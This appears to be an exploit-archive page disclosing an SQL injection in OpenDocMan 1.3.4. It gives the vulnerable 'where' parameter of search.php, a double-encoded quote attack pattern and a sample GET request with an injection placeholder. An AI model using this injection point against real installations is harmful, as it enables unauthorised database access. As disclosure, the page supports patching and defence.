Opendocman 1.3.4 search.php where sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-03-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Opendocman 1.3.4 search.php where sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management
system (DMS) written in PHP designed
to comply with ISO 17025 and OIE standard for document management.
It features fine grained control of access to files, and automated
install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================